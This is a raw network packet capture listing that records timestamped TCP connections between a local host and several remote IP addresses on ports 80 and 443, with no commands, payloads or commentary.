                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.820524931 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.820627928 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.821548939 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.821651936 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.821681023 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.821691990 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.822731972 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.822773933 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.822843075 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.822912931 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.823843002 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.823904037 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.823986053 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.824024916 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.825001001 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.825104952 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.825113058 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.825211048 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.826212883 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.826265097 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.826302052 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.826373100 CET44349827172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.826385975 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.826663971 CET49827443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.826670885 CET44349827172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.827126026 CET44349827172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.827166080 CET49825443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.827172041 CET44349825172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.827301979 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.827414989 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.827450037 CET49827443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.827491045 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.827526093 CET44349827172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.828424931 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.828497887 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.828541994 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.828603029 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.829648972 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.829727888 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.829747915 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.829802036 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.830760956 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.830857992 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.830898046 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.830898046 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.831957102 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.832017899 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.832078934 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.832145929 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.833112955 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.833211899 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.833271027 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.833323002 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.834213018 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.834286928 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.834317923 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.834383965 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.835377932 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.835488081 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.835525036 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.835639000 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.836518049 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.836606979 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.836740971 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.836800098 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.837167978 CET44349828172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.837425947 CET49828443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.837461948 CET44349828172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.837631941 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.837685108 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.838562965 CET44349828172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.838922977 CET49828443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.839096069 CET44349828172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.842204094 CET49826443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.860661983 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.861221075 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.861284971 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.862004995 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.862020969 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.872479916 CET49825443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.872750998 CET49827443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.888586044 CET49828443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.987957954 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988017082 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988029003 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988066912 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988225937 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988253117 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988261938 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988302946 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988318920 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988326073 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988336086 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988365889 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988395929 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988396883 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988430023 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988487959 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988586903 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988755941 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988790035 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988805056 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.988856077 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.989891052 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.989948034 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.990010023 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.990104914 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.991034985 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.991142988 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.991259098 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.991455078 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.992156029 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.992280960 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.992322922 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.992322922 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.993310928 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.993371010 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.993432045 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.993484020 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.994442940 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.994574070 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.994633913 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.995634079 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.995769024 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.995819092 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.995819092 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.996751070 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.996848106 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.996891975 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.997097015 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.997915030 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.998024940 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.998053074 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.998104095 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.999056101 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.999167919 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.999170065 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.999212027 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.000226974 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.000334024 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.000355959 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.000561953 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.001383066 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.001475096 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.001558065 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.002487898 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.002609015 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.002621889 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.002682924 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.003669977 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.003734112 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.003793955 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.003951073 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.004831076 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.004883051 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.004924059 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.005043030 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.005950928 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.006006956 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.006062984 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.006149054 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.007097006 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.007220984 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.007249117 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.007337093 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.008239031 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.008352041 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.008358002 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.008466959 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.009408951 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.009512901 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.009515047 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.009650946 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.010559082 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.010668039 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.010715008 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.010715008 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.011677980 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.011744022 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.011778116 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.011888027 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.012831926 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.012937069 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.013133049 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.013391972 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.013999939 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.014115095 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.014132023 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.014194012 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.015149117 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.015249968 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.015290976 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.015290976 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.016323090 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.016402960 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.016427994 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.016556978 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.017447948 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.017568111 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.017752886 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.018593073 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.018668890 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.018692970 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.018856049 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.019735098 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.019819021 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.019855976 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.019927025 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.020909071 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.021013975 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.021023989 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.021063089 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.022093058 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.022166967 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.022175074 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.022255898 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.023211002 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.023317099 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.023319960 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.023382902 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.024329901 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.024379969 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.024396896 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.024442911 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.025564909 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.025706053 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.025790930 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.026663065 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.026743889 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.026762962 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.026801109 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.027832031 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.027889013 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.027926922 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.028018951 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.028947115 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.029011011 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.029030085 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.029274940 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.030112982 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.030203104 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.030225039 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.030314922 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.031249046 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.031341076 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.031394005 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.031454086 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.032424927 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.032527924 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.032569885 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.032618999 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.033543110 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.033648968 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.033710003 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.034681082 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.034888983 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.034912109 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.035010099 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.035855055 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.035907984 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.035945892 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.036005020 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.037014008 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.037297964 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.037365913 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.038168907 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.038276911 CET4977380192.168.2.5185.215.113.206
